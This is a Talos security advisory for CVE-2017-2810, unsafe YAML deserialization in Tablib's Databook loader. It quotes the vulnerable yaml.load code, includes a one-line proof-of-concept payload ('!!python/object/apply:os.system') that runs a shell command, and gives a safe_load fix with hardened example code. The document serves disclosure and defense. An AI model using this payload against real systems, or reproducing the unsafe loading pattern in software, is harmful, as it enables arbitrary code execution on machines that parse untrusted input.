Tablib Yaml Load Code Execution Vulnerability

2017-06-13T00:00:00
ID TALOS-2017-0307
Type talos
Reporter Talos Intelligence
Modified 2017-06-13T00:00:00

Description

Talos Vulnerability Report

TALOS-2017-0307

Tablib Yaml Load Code Execution Vulnerability

June 13, 2017
CVE Number

CVE-2017-2810

Summary

An exploitable vulnerability exists in the Databook loading functionality of Tablib. A Databook loaded from YAML can execute arbitrary Python code, resulting in command execution. An attacker can insert Python into the loaded YAML to trigger this vulnerability.

Tested Versions

Tablib v0.11.4

Product URLs

<https://pypi.python.org/pypi/tablib>

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Details

Tablib is a Python dataset library used to agnostically generate various tabular formats from data. Tablib is also the main driver behind the django-import-export application and library.

tablib/formats/_yaml.py:31
def import_book(dbook, in_stream):
    """Returns databook from YAML stream."""

    dbook.wipe()

    for sheet in yaml.load(in_stream): [0]
        data = tablib.Dataset()
        data.title = sheet['title']
        data.dict = sheet['data']
        dbook.add_sheet(data)

Tablib leverages the unsafe API yaml.load [0] to import the incoming YAML stream into the Databook. This YAML can contain a python directive that executes arbitrary commands.

Exploit Proof-of-Concept

A test leveraging the Tablib API shows the commands being executed:

(tablib) user in ~
In [1]: import tablib

In [2]: databook = tablib.Databook()

In [3]: databook.load('yaml', '!!python/object/apply:os.system ["ls"]')
AUTHORS         HISTORY.rst     MANIFEST.in     NOTICE          build           docs            tablib          test_tablib.py
HACKING         LICENSE         Makefile        README.rst      dist            setup.py        tablib.egg-info tox.ini

Mitigation

Replace yaml.load with yaml.safe_load.
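The following is an added example, not Tablib's own code: a hardened counterpart of the import_book function quoted above that uses yaml.safe_load, plus a small shape check on the decoded document. It assumes PyYAML is installed; the Dataset and Databook classes are minimal hypothetical stand-ins so the example runs without Tablib. The safe loader only builds plain mappings, sequences and scalars, so any python-specific tag (the !!python/object/apply family from the advisory, or the harmless !!python/tuple used here) is refused with a ConstructorError before anything is constructed.

```python
"""Hardened import_book using PyYAML's safe loader (added example, not tablib code).

Assumes PyYAML is installed. Dataset and Databook below are hypothetical
stand-ins for tablib.Dataset / tablib.Databook, kept to the attributes the
original import_book touches.
"""
import yaml


class Dataset:
    """Minimal stand-in for tablib.Dataset (hypothetical, for this example)."""

    def __init__(self):
        self.title = None
        self.dict = []


class Databook:
    """Minimal stand-in for tablib.Databook (hypothetical, for this example)."""

    def __init__(self):
        self._datasets = []

    def wipe(self):
        self._datasets = []

    def add_sheet(self, dataset):
        self._datasets.append(dataset)

    def sheets(self):
        return list(self._datasets)


def import_book_safe(dbook, in_stream):
    """Returns databook from a YAML stream, using only the safe loader.

    yaml.safe_load never resolves language-specific tags such as
    !!python/object/apply; it raises yaml.constructor.ConstructorError
    instead of instantiating anything. The shape checks make sure the
    decoded document really is a list of {title, data} sheets.
    """
    dbook.wipe()
    book = yaml.safe_load(in_stream)
    if not isinstance(book, list):
        raise ValueError("YAML databook must be a sequence of sheets")
    for sheet in book:
        if not isinstance(sheet, dict) or not all(k in sheet for k in ("title", "data")):
            raise ValueError("each sheet needs 'title' and 'data' keys")
        data = Dataset()
        data.title = sheet["title"]
        data.dict = sheet["data"]
        dbook.add_sheet(data)
    return dbook


def load_or_reject(in_stream):
    """Returns ('ok', [(title, rows), ...]) for a well-formed book, or
    ('rejected', reason) when the safe loader refuses the document or the
    document has the wrong shape."""
    dbook = Databook()
    try:
        import_book_safe(dbook, in_stream)
    except yaml.constructor.ConstructorError as exc:
        # Raised for every tag the safe loader has no constructor for.
        return ("rejected", f"unsafe tag refused: {exc.problem}")
    except (yaml.YAMLError, ValueError) as exc:
        return ("rejected", str(exc))
    return ("ok", [(s.title, s.dict) for s in dbook.sheets()])


# Constructed sample input: a benign two-sheet databook.
BENIGN_BOOK = """
- title: Employees
  data:
    - {name: Alice, dept: Eng}
    - {name: Bob, dept: Ops}
- title: Sites
  data:
    - {city: Lisbon}
"""

# Constructed sample input: carries a python-specific tag of the same family
# the advisory describes; safe_load refuses it before any object is built.
TAGGED_BOOK = "- title: !!python/tuple [1, 2]\n  data: []\n"

if __name__ == "__main__":
    print(load_or_reject(BENIGN_BOOK))
    print(load_or_reject(TAGGED_BOOK))
```

The benign document loads into two sheets; the tagged document is rejected with "could not determine a constructor for the tag 'tag:yaml.org,2002:python/tuple'". Note that in PyYAML 6.0 and later yaml.load requires an explicit Loader argument, but yaml.safe_load remains the right call whenever the stream comes from an untrusted source.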

Timeline

2017-04-18 - Vendor Disclosure
2017-06-13 - Public Release

Credit

Discovered by Cory Duplantis of Cisco Talos.
